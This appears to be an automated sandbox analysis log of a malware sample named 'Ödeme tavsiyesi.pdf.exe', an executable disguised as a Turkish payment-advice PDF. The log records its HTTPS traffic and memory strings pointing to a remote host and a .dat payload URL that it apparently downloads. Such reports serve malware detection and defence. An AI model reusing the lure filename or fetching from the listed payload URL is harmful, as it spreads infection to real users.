Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:20:50 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:20:52 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:20:54 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:20:56 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:20:57 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:20:59 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:01 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:03 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:05 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:07 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:09 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:10 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:12 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:14 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:16 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:18 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:20 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:22 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:24 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:25 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:27 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:29 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:31 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:33 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:35 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:37 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:39 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:41 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:43 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:45 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:46 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:21:48 GMTvary: User-Agent
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000253B000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000235A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000266F000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000023DB000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.0000000002415000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000253B000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000235A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.comd
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000233F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000233F000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000023DB000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbxb
Source: #U00d6deme tavsiyesi.pdf.exeString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbz.dat
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbz.datd
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000022E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbz.datto
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.7:49700 version: TLS 1.2

System Summary

barindex
Source: initial sampleStatic PE information: Filename: #U00d6deme tavsiyesi.pdf.exe
